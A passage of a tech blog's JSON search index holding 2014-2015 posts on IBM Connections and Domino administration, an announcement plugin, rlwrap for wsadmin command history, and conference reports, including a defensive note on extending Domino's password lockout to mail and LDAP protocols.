shortcuts.\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-02-13-some-shortcuts-with-vim/","title":"Some shortcuts with vim"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ssh/","title":"SSH"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vi/","title":"Vi"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vim/","title":"Vim"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/connected/","title":"ConnectED"},{"body":"Last week i was at ConnectED 2015 in Orlando. I enjoyed the event very much, mainly because i met great old and new friends. The Lotus community is one of the best i’ve ever met, or i ever was part of.\nAfter coming home i found out that i have a flu and the headache and need of sleep is not age dependent. So the visits to kimonos and dolphin bar are a little bit shorter than last year, but i enjoyed them nevertheless.\nI did a session during ConnectED 2015, see the last version of slides here:\nToday i read in Anderl Artners Blog , that he provides some Assembly Lines for TDI/SDI , which can help you with SPNEGO and mailintegration. Thanks for that!\n","excerpt":"\u003cp\u003eLast week i was at ConnectED 2015 in Orlando. I enjoyed the event very\nmuch, mainly because i met great old and new friends. The Lotus\ncommunity is one of the best i’ve ever met, or i ever was part of.\u003c/p\u003e\n\u003cp\u003eAfter coming home i found out that i have a flu and the headache and\nneed of sleep is not age dependent. So the visits to kimonos and dolphin\nbar are a little bit shorter than last year, but i enjoyed them\nnevertheless.\u003c/p\u003e\n\u003cp\u003eI did a session during ConnectED 2015, see the last version of slides\nhere:\u003c/p\u003e\n\u003cp\u003eToday i read in \u003ca href=\"http://tdiblog.anderls.com\" target=\"_blank\"\u003eAnderl Artners Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, that he\nprovides\n\u003ca href=\"http://tdiblog.anderls.com/2015/02/adding-user-active-directory.html\" target=\"_blank\"\u003esome\nAssembly Lines for TDI/SDI \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which can help you with SPNEGO and\nmailintegration. Thanks for that!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-02-04-ibm-connected-2015-short-review-presentation-and-addon/","title":"IBM ConnectED 2015 – short review, presentation and addon"},{"body":"Last week i searched a way to send all Connections users an information on important updates, which should be configurable and uses cookies to hide it for a specific time.\nFirst i had a look at the Greenhouse Announcement Widget which is used within Greenhouse .\nQuite nice, but i had problems with IE 9 users and the popup appears on each page you open within Connections. So i tried something other.\nAfter some searching i found a script of Ollie Phillips which is originally used to inform users about Cookie usage on the site. Ollie published the cookiesDirective.js under the MIT License. When you find the announcement slider useful, please buy him a beer .\nI took the script and put it to a osgi bundle and added some configuration parameters.\nIf you want to test it, , please use the updated archive! Download link see last point in this post!\nInstallation Unarchive the package and copy de.stoeps.announcement_1.0.0.jar to your Connections customization folder/provision/webresources and the folder de (and all content below) to customization/javascript.\nThe text which is shown within the slider can be edited within customization/javascript/de/stoeps/announcement/popup.txt. You can use html code and links within this text file. So you can add links to additional informations.\nBackground color backgroundColor: '#CACACA', button text (buttonTextPre \u0026amp; buttonTextPost) and opacity (set backgroundOpacity: '99' to show a solid color) is configured in customization/javascript/de/stoeps/announcement/initialize.js\nThe announcement can be disabled with announcementEnabled: 'false'.\ncookieLiveTime: 2 set the cookie to 2 days, so your users get the announcement again after 2 days and must confirm with the button.\nAfter installation and after changes in initialize.js you must restart Common Application.\nUpdate Klaus and Rainer mentioned problems with german language within the browsers. So i renamed the plugin from de.stoeps to org.scripting101.\nPlease use the following archive to install the announcement osgi plugin!\nannouncement-osgi-1.0.1 Installation and customization is nearly the same, only the path within customization/javascript changes from de/stoeps to org/scripting101!\nThanks for testing guys.\n","excerpt":"\u003cp\u003eLast week i searched a way to send all Connections users an information\non important updates, which should be configurable and uses cookies to\nhide it for a specific time.\u003c/p\u003e\n\u003cp\u003eFirst i had a look at the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=CD9C52D5287E82E285257A83005BF10D\" target=\"_blank\"\u003eGreenhouse\nAnnouncement Widget \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n which is used within\n\u003ca href=\"http://greenhouse.lotus.com\" target=\"_blank\"\u003eGreenhouse \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/12/2014-12-19_16-46-41.png\" alt=\"2014 12 19 16 46 41\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eQuite nice, but i had problems with IE 9 users and the popup appears on\neach page you open within Connections. So i tried something other.\u003c/p\u003e\n\u003cp\u003eAfter some searching i found a \u003ca href=\"http://cookiesdirective.com/\" target=\"_blank\"\u003escript of\nOllie Phillips \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n which is originally used to inform users about Cookie\nusage on the site. Ollie published the cookiesDirective.js under the MIT\nLicense. When you find the announcement slider useful,\n\u003ca href=\"http://cookiesdirective.com/index.php#whosbehind\" target=\"_blank\"\u003eplease buy him a beer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-19-announcement-plugin-for-ibm-connections/","title":"Announcement plugin for IBM Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customizing/","title":"Customizing"},{"body":"Today IBM announced the session agenda for IBM ConnectED 2015 .\nI’m really interested in the new concept of more technical content and hope that all attendees will enjoy the format of the smaller designed event.\nMy session “BP203: Best And Worst Practices in Deploying IBM Connections” is accepted and i’m proud and happy to go to Orlando in january 2015 again.\nIf you haven’t already registered, follow this link .\nHere some points of my planned agenda for this session: Depending on deployment size, operating system and security considerations you have different options to configure IBM Connections.\nThis session will show worst practices examples from multiple customer deployments of IBM Connections. I will describe things I found and how you can optimize your systems.\nMain topics include:\nDo’s and Don’ts during IBM Connections deployments\nsimple (documented) tasks that should be applied\nmissing documentation\nautomated user synchronization, TDI solutions and user synchronization\nperformance tuning\nsecurity optimizing and planning\nSingle Sign On for mail, IBM Sametime and SPNEGO.\n","excerpt":"\u003cp\u003eToday IBM announced the\n\u003ca href=\"https://www-950.ibm.com/events/global/ibmced/agenda/preview.html\" target=\"_blank\"\u003esession\nagenda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003eIBM\nConnectED 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI’m really interested in the new concept of more technical content and\nhope that all attendees will enjoy the format of the smaller designed\nevent.\u003c/p\u003e\n\u003cp\u003eMy session\n\u003ca href=\"https://www-950.ibm.com/events/global/ibmced/agenda/preview.html?sessionid=-BP203\" target=\"_blank\"\u003e“BP203:\nBest And Worst Practices in Deploying IBM Connections” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is accepted and\ni’m proud and happy to go to Orlando in january 2015 again.\u003c/p\u003e\n\u003cp\u003eIf you haven’t already registered, follow this\n\u003ca href=\"http://www.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003elink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003ch1 id=\"here-some-points-of-my-planned-agenda-for-this-session\"\u003eHere some points of my planned agenda for this session: \u003ca href=\"#here-some-points-of-my-planned-agenda-for-this-session\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDepending on deployment size, operating system and security\nconsiderations you have different options to configure IBM Connections.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-10-ibm-connected-2015-session-best-and-worst-practices-in-deploying-ibm-connections/","title":"IBM ConnectED 2015 – Session “Best and Worst Practices in deploying IBM Connections”"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibm-champion/","title":"IBM Champion"},{"body":"IBM announced the new and returning IBM Champions Class for IBM Collaboration Solutions. I’m really proud that I was nominated and elected this year again. Thanks!\nSo i see forward to IBM ConnectED 2015 to meet the other 95 IBM Champions. Big congratulations to all of them. Special thanks to Oli and Amanda , they are open for questions nearly all day and supports us within IBM.\nWhat’s an IBM Champion? Good explanation can be found on the nomination post:\nThese individuals are non-IBMers who evangelize IBM solutions, share their knowledge and help grow the community of professionals who are focused on social business and IBM Collaboration Solutions. IBM Champions spend a considerable amount of their own time, energy and resources on community efforts — organizing and leading user group events, answering questions in forums, contributing wiki articles and applications, publishing podcasts, sharing instructional videos and more!\n","excerpt":"\u003cp\u003e\u003ca href=\"https://www.ibm.com/developerworks/community/blogs/ibmchampion/entry/announcing_the_2015_class_of_ibm_champions_for_ics?lang=en\" target=\"_blank\"\u003eIBM\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the new and returning IBM Champions Class for IBM\nCollaboration Solutions. I’m really proud that I was nominated and\nelected this year again. Thanks!\u003c/p\u003e\n\u003cp\u003eSo i see forward to\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003eIBM\nConnectED 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to meet the other 95 IBM Champions. Big congratulations\nto all of them. Special thanks to \u003ca href=\"http://twitter.com/oliheinz\" target=\"_blank\"\u003eOli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://twitter.com/amandabaumann\" target=\"_blank\"\u003eAmanda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, they are open for questions\nnearly all day and supports us within IBM.\u003c/p\u003e\n\u003ch1 id=\"whats-an-ibm-champion\"\u003eWhat’s an IBM Champion? \u003ca href=\"#whats-an-ibm-champion\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eGood explanation can be found on the nomination post:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThese individuals are non-IBMers who evangelize IBM solutions, share\ntheir knowledge and help grow the community of professionals who are\nfocused on social business and IBM Collaboration Solutions. IBM\nChampions spend a considerable amount of their own time, energy and\nresources on community efforts — organizing and leading user group\nevents, answering questions in forums, contributing wiki articles and\napplications, publishing podcasts, sharing instructional videos and\nmore!\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-10-ibm-champions-2015-for-ics/","title":"IBM Champions 2015 for ICS"},{"body":"Since years i think that the Internet Lockout Feature of IBM Domino is not enough. The function is documented here: IBM Domino Administrator Help Cite of this document:\nThere are some usage restrictions for Internet password lockout: You can only use Internet password lockout with Web access. Other Internet protocols and services, such as LDAP, POP, IMAP, DIIOP, IBM® Lotus® Quickr®, and IBM Sametime® are not currently supported. However, Internet password lockout can be used for Web access if the password that is used for authentication is stored on an LDAP server\nSo documentation tells us, that only HTTP can be secured through inetlockout.nsf and over years the documentation was right. So protocols like LDAP, SMTP or POP3 are prone to dictionary attacks.\nLast week at a customer site i can’t login into IBM Connections, even with the right spelled password. After checking the Domino server i found that the user has an entry in the inetlockout.nsf database. That was the first time that i had this behavior, Domino server was version 8.5.3.\nToday i had some spare time and checked the other protocols of my demo server for my AdminCamp sessions next week.\nSo i secured SMTP, POP3 and IMAP for authentication and started to use the wrong password for login and i tried to test wrong passwords on LDAP authenticated Sametime and Connections. What should i say? I was lockedout through all protocols! Martin Leyrer points me to following technote , where the feature is mentioned to secure SMTP against brute force. That’s the only document i can find where the extended inetlockout is mentioned or documented. I don’t know how many of my customers or friends asks for this feature, but we talked often about this. That’s a feature we asked long time and which is really important for all deployments of Domino with internet access. Now all important protocols are save against brute force or dictionary attacks.\nSo great news, but the documentation must be updated and the feature must be officially announced.\nWhy?\nIt is a really important security feature\nIf you use already inetlockout for http and you update your Domino server, the feature is active without any additional work! Good for security, but your helpdesk team could be a little bit surprised.\nWhich Domino version first had this code icluded?\nWhen you want to know how to deploy the lockout feature, please read documentation and this technote .\nUpdate: I got a mail that with 8.5.3 FP6 only SMTP and LDAP are working with inetlockout. I can’t test this in the moment, but with 9.0.1 pop3 and imap are secured too. Need to test this back with lower version and diiop.\nnginx You can use nginx as a reverse proxy for mail protocols . So this is a way to add SHA256 enabled certifiers in front of your domino servers.\n","excerpt":"\u003cp\u003eSince years i think that the Internet Lockout Feature of IBM Domino is\nnot enough. The function is documented here:\n\u003ca href=\"http://www-12.lotus.com/ldd/doc/domino_notes/9.0/help9_admin.nsf/f4b82fbb75e942a6852566ac0037f284/bd211a25c369e2e085257b19005b4d79?OpenDocument\" target=\"_blank\"\u003eIBM\nDomino Administrator Help \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eCite of this document:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThere are some usage restrictions for Internet password lockout: You can\nonly use Internet password lockout with Web access. Other Internet\nprotocols and services, such as \u003cstrong\u003eLDAP, POP, IMAP, DIIOP, IBM® Lotus®\nQuickr®, and IBM Sametime® are not currently supported\u003c/strong\u003e. However,\nInternet password lockout can be used for Web access if the password\nthat is used for authentication is stored on an LDAP server\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eSo documentation tells us, that only HTTP can be secured through\ninetlockout.nsf and over years the documentation was right. So protocols\nlike LDAP, SMTP or POP3 are prone to dictionary attacks.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-09-26-securing-domino-protocols-against-brute-force-attacks/","title":"Securing Domino Protocols against Brute Force Attacks"},{"body":"So my vacation is finished, i enjoyed 13 lovely rainy days in bavaria and see forward to my next travels. Hope to get some sun at ICON UK in London next week.\nI will speak with Sharon about Tips and Scripts for your daily business our session we made for Connect 2014 and which is updated for IBM Connections 5 now.\nAdmincamp will be at 29th september to 1st october in Gelsenkirchen. Admincamp is a great event with lots of technical content and no advertises, organized by Rudi Knegt and some more . I enjoy it very much to be again part of it, this year i will prepare three sessions with Klaus Bild .\n41st DNUG will be at 11. and 12. November in Leipzig. I made some session proposals and will see if i can speak there and meet the german ICS community.\nLast but not least Social Connections VII will be in Stockholm at 13th and 14th november. Agenda is still open, but i made a session proposal and see forward to meet the Connections User group there.\n","excerpt":"\u003cp\u003eSo my vacation is finished, i enjoyed 13 lovely rainy days in bavaria\nand see forward to my next travels. Hope to get some sun at\n\u003ca href=\"http://iconuk.org\" target=\"_blank\"\u003eICON UK \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in London next week.\u003c/p\u003e\n\u003cp\u003eI will speak with \u003ca href=\"http://cube-soft.co.uk/blog/\" target=\"_blank\"\u003eSharon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n about\n\u003ca href=\"http://iconuk.org/iconuk/iconuk2014.nsf/session.xsp?action=openDocument\u0026amp;documentId=D46A8FE17AEF4D1580257CE00066F281\" target=\"_blank\"\u003eTips\nand Scripts for your daily business \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n our session we made for Connect\n2014 and which is updated for IBM Connections 5 now.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n will be at 29th september to 1st\noctober in Gelsenkirchen. Admincamp is a great event with lots of\ntechnical content and no advertises, organized by\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Mitarbeiter\" target=\"_blank\"\u003eRudi Knegt and some more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI enjoy it very much to be again part of it, this year i will prepare\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Agenda\" target=\"_blank\"\u003ethree sessions \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n with\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-09-02-my-next-ics-events/","title":"My next ICS events"},{"body":"Missing command history on Linux is a little problem when using command line utilities like wsadmin, db2, sqlplus and so on.\nI found a solution for this today.\nYou can use rlwrap to get command history for all applications on the console and it is possible to recall and edit the commands. Rlwrap uses readline.\nInstallation on CentOS: yum install readline-static gcc make tar -xvzf rlwrap-0.41.tar.gz cd rlwrap-0.41 ./configure make make install Call rlwrap with wsadmin: rlwrap -r /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin/wsadmin.sh -lang jython -username wasadmin -password password rlwrap and db2 rlwrap -r db2 Use rlwrap everytime with alias vim ~/.bash_profile export WAS_HOME=/opt/IBM/WebSphere/AppServer export DMGR=Dmgr01 alias db2=\u0026#39;rlwrap -r db2\u0026#39; alias wsadmin=\u0026#39;cd $WAS_HOME/profiles/$DMGR/bin;rlwrap -r ./wsadmin.sh -lang jython\u0026#39; ","excerpt":"\u003cp\u003eMissing command history on Linux is a little problem when using command\nline utilities like wsadmin, db2, sqlplus and so on.\u003c/p\u003e\n\u003cp\u003eI found a \u003ca href=\"http://bereanstechnology.com/index.php?q=node/42\" target=\"_blank\"\u003esolution \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nthis today.\u003c/p\u003e\n\u003cp\u003eYou can use \u003ca href=\"http://utopia.knoware.nl/~hlub/uck/rlwrap/#rlwrap\" target=\"_blank\"\u003erlwrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to\nget command history for all applications on the console and it is\npossible to recall and edit the commands. Rlwrap uses readline.\u003c/p\u003e\n\u003ch1 id=\"installation-on-centos\"\u003eInstallation on CentOS: \u003ca href=\"#installation-on-centos\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eyum install readline-static gcc make\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etar -xvzf rlwrap-0.41.tar.gz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ecd\u003c/span\u003e rlwrap-0.41\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e./configure\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emake\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emake install\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"call-rlwrap-with-wsadmin\"\u003eCall rlwrap with wsadmin: \u003ca href=\"#call-rlwrap-with-wsadmin\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlwrap -r /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin/wsadmin.sh -lang jython -username wasadmin -password password\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"rlwrap-and-db2\"\u003erlwrap and db2 \u003ca href=\"#rlwrap-and-db2\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlwrap -r db2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"use-rlwrap-everytime-with-alias\"\u003eUse rlwrap everytime with alias \u003ca href=\"#use-rlwrap-everytime-with-alias\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003evim ~/.bash_profile\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003eexport\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWAS_HOME\u003c/span\u003e=/opt/IBM/WebSphere/AppServer\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003eexport\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eDMGR\u003c/span\u003e=Dmgr01\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ealias\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003edb2\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#39;rlwrap -r db2\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ealias\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ewsadmin\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#39;cd $WAS_HOME/profiles/$DMGR/bin;rlwrap -r ./wsadmin.sh -lang jython\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2014/2014-07-31-command-history-wsadmin-on-linux/","title":"Command history wsadmin on Linux"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/prague/","title":"Prague"},{"body":"This week starts in the beautiful town Prague with Social Connections VI. I met great people and first of all i want to thank the organisation team for this great event.\nAt the end we made the traditional image with all attendees.\nFoto ©2014 by Oli Heinz I enjoyed two very delicious dinners and had great discussions around IBM ICS, met old and new friends. After years of tweets, forum entries and virtual talks i finally met Martin in person and had an entertaining evening with him and Sjaak .\nFoto ©2014 by Oli Heinz Big thanks to Oliver Heinz who made fantastic photos of prague, us and around the event . All pictures in this blog posts are made by him.\nMy session Script it! This time i made a session without support of Klaus or Sharon , but i was happy with the result and i hope that some attendees will help to get the IBMCNX Community scripts more complete.\nFoto ©2014 by Oli Heinz And for everyone the offer again, you see the different kinds of persistent Skype group chats, if you want to join, send me a short message.\nDuring this week we heared several announcements: IBM Connections 5 will ship on 26th of june Files Connector (Beta) for Mac is announced for IBM CNX 5 CR1\nnext Social Connections (VII) will be in Stockholm on 10th and 11th of November 2014\nI see forward to Social Connections VII and hope to meet lots of you there!\n","excerpt":"\u003cp\u003eThis week starts in the beautiful town\n\u003ca href=\"http://www.praguewelcome.cz/en/\" target=\"_blank\"\u003ePrague \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n with Social Connections VI. I\nmet great people and first of all i want to thank the\n\u003ca href=\"http://socialconnections.info/about/the-team/\" target=\"_blank\"\u003eorganisation team \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nthis great event.\u003c/p\u003e\n\u003cp\u003eAt the end we made the traditional image with all attendees.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/06/14474080153_48345ce2b9_b.jpg\" alt=\"14474080153 48345ce2b9 b\" /\u003e\n\u003c/p\u003e\n\n\nFoto ©2014 by \u003ca href=\"http://twitter.com/oliheinz\" target=\"_blank\"\u003eOli Heinz \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eI enjoyed two very delicious dinners and had great discussions around\nIBM ICS, met old and new friends. After years of tweets, forum entries\nand virtual talks i finally met \u003ca href=\"http://martin.leyrer.priv.at/\" target=\"_blank\"\u003eMartin \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\nperson and had an entertaining evening with him and\n\u003ca href=\"http://twitter.com/sursinus\" target=\"_blank\"\u003eSjaak \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/06/14452796814_e840d6561a_b.jpg\" alt=\"14452796814 e840d6561a b\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-06-19-social-connections-vi-in-prague/","title":"Social Connections VI in Prague"},{"body":"As preparation for Social Connections VI in Prague next week i redesigned the Administration Scripts for IBM Websphere .\nSome highlights:\nall scripts are moved to a subfolder with DMGR/bin (folder name: ibmcnx)\ntested in multinode environments\nadded some classes everybody can use for his own scripts\nadding policies to libraries (personal and communities) are using search now\nNew scripts:\ndocumentation of all jvm settings of each application server\ncreate a file with all documentation in one step\ncreate cluster members for additional nodes\nSharon created a document with the content of all of our presentations and collected several tipps all around connections and community scripts. She will share this next time. We started to share parts of this document and more documentations (installation, usage) for scripts and IBM Connections on:\nScripting101.org The new version can be downloaded from:\nOpenNTF GitHub ","excerpt":"\u003cp\u003eAs preparation for\n\u003ca href=\"http://socialconnections.info/events/social-connections-vi/\" target=\"_blank\"\u003eSocial\nConnections VI in Prague \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n next week i redesigned the\n\u003ca href=\"http://openntf.org/main.nsf/project.xsp?r=project/Administration%20Scripts%20for%20WebSphere/releases/C06D87632050DDCC86257CF5004E18A7\" target=\"_blank\"\u003eAdministration Scripts for IBM Websphere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eSome highlights:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eall scripts are moved to a subfolder with DMGR/bin (folder name:\nibmcnx)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003etested in multinode environments\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eadded some classes everybody can use for his own scripts\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eadding policies to libraries (personal and communities) are using\nsearch now\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew scripts:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003edocumentation of all jvm settings of each application server\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ecreate a file with all documentation in one step\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ecreate cluster members for additional nodes\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSharon created a document with the content of all of our presentations\nand collected several tipps all around connections and community\nscripts. She will share this next time. We started to share parts of\nthis document and more documentations (installation, usage) for scripts\nand IBM Connections on:\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-06-14-new-version-of-administration-scripts-for-websphere/","title":"New version of “Administration Scripts for WebSphere”"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/scripting/","title":"Scripting"},{"body":"IBM released a tech document on friday with title: Search fails with the error CLFRW0060E: Input-output exception .\nThis document solves one of my problems i had in a demo environment since two weeks. I traced the environment, checked j2ee roles, reinstalled CR3 and 4, redeployed search and activities, but i always got an error, when the search wants to access the activities seed list.\nSo what happened? I want to show the /search/serverStatus page in a course and for this i want to remove all warnings and errors. When you don’t set SEARCH_SEEDLIST_TIMEOUT, you get a warning, that the variable is not set.\nSo i had set this to 150 and checked the serverStatus page and all was green. So i thought everything is ok and didn’t check the documentation to this. After some hours the search was broken, with the error mentioned above. When i checked the Seedlist URL with the browser everything was ok, when the search wants to access it i got the Input-output exception.\nWhen you read the tech document, you see that SEARCH_SEEDLIST_TIMEOUT is needed in miliseconds! So i 